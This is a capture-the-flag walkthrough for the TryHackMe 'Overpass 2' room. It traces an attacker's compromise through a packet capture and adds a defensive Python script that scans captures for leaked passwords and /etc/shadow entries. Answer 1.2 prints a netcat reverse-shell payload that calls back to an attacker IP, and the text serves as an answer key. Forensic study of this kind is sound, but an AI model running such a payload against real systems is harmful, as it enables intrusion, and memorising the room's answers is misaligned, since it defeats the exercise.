This was an easy Linux machine and the second in the Overpass TryHackMe series. It involved analyzing a capture file containing the requests an attacker issued to compromise the web server, escalate privileges to root and establish persistence, in order to understand the exact steps they followed, and then using that information to hack back into the host.

Overpass has been hacked! The SOC team (Paradox, congratulations on the promotion) noticed suspicious activity on a late night shift while looking at shibes, and managed to capture packets as the attack happened.

Can you work out how the attacker got in, and hack your way back into Overpass’ production server?

Note: Although this room is a walkthrough, it expects familiarity with tools and Linux. I recommend learning basic Wireshark and completing Linux Fundamentals as a bare minimum.

Md5sum of PCAP file: 11c3b2e9221865580295bc662c35c6dc

1.1 What was the URL of the page they used to upload a reverse shell?

Open the overpass2.pcapng file in Wireshark and analyze the HTTP traffic (enter http as the display filter). Right-click on the first HTTP frame and select “Follow > TCP Stream”. Here is the first request.

1.2 What payload did the attacker use to gain access?

Now we look for the reverse shell that the attacker uploaded to the system. Right-click on the HTTP frame and select “Follow > TCP Stream”.

Answer: &1|nc 192.168.170.145 4242 >/tmp/f")?>

1.3 What password did the attacker use to privesc?

After that, we set the search string and look for requests containing passwords. Requests that match this search are now marked. We look at the TCP stream and we have james’ password.

1.4 How did the attacker establish persistence?

Still in the same stream, scrolling down reveals that the attacker downloaded an SSH backdoor to establish persistence.

1.5 Using the fasttrack wordlist, how many of the system passwords were crackable?

In the same stream, the attacker dumped the content of the /etc/shadow file just before downloading the SSH backdoor.
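An added example, not part of the original walkthrough: a Python triage pass over raw capture bytes that checks the MD5 given above and flags what the followed TCP stream exposed in cleartext, namely a password prompt and /etc/shadow entries, so the affected accounts can be listed for rotation. The sample bytes, account names and hash strings are constructed, and `triage` is a hypothetical helper name.

```python
import hashlib
import re

# MD5 of overpass2.pcapng as published in the walkthrough.
EXPECTED_MD5 = "11c3b2e9221865580295bc662c35c6dc"

# Password prompts that appear in cleartext in an unencrypted shell session.
PROMPT_RE = re.compile(rb"(?i)password(?: for [\w.-]+)?\s*:")
# /etc/shadow entry: name:hash:lastchange:...
# The hash field is "$id$..." when a password is set, "*" or "!" when locked.
SHADOW_RE = re.compile(rb"(?m)^([a-z_][a-z0-9_-]*):(\$(\w+)\$[^:\s]+|[*!]+):\d*:")

def triage(capture: bytes) -> dict:
    """Scan raw capture bytes for exposed credentials (a strings-and-grep pass)."""
    exposed, locked = [], []
    for m in SHADOW_RE.finditer(capture):
        user = m.group(1).decode()
        if m.group(3):                       # a real hash left the host
            exposed.append((user, m.group(3).decode()))
        else:                                # locked account, no usable hash
            locked.append(user)
    return {
        "md5_ok": hashlib.md5(capture).hexdigest() == EXPECTED_MD5,
        "prompt_offsets": [m.start() for m in PROMPT_RE.finditer(capture)],
        "exposed_hashes": exposed,           # (account, crypt algorithm id)
        "locked_accounts": locked,
    }

# Constructed sample standing in for the payload of a followed TCP stream.
SAMPLE = (
    b"$ sudo -l\n[sudo] password for alice: PLACEHOLDER-SECRET\n"
    b"# cat /etc/shadow\n"
    b"root:*:18295:0:99999:7:::\n"
    b"alice:$6$CONSTRUCTEDSALT$CONSTRUCTEDHASH:18464:0:99999:7:::\n"
    b"bob:$6$CONSTRUCTEDSALT$CONSTRUCTEDHASH2:18464:0:99999:7:::\n"
)

if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```

On a real capture, pass the bytes of the stream saved from the “Follow > TCP Stream” window; a scan of the whole pcapng file can miss an entry that starts right after a packet header.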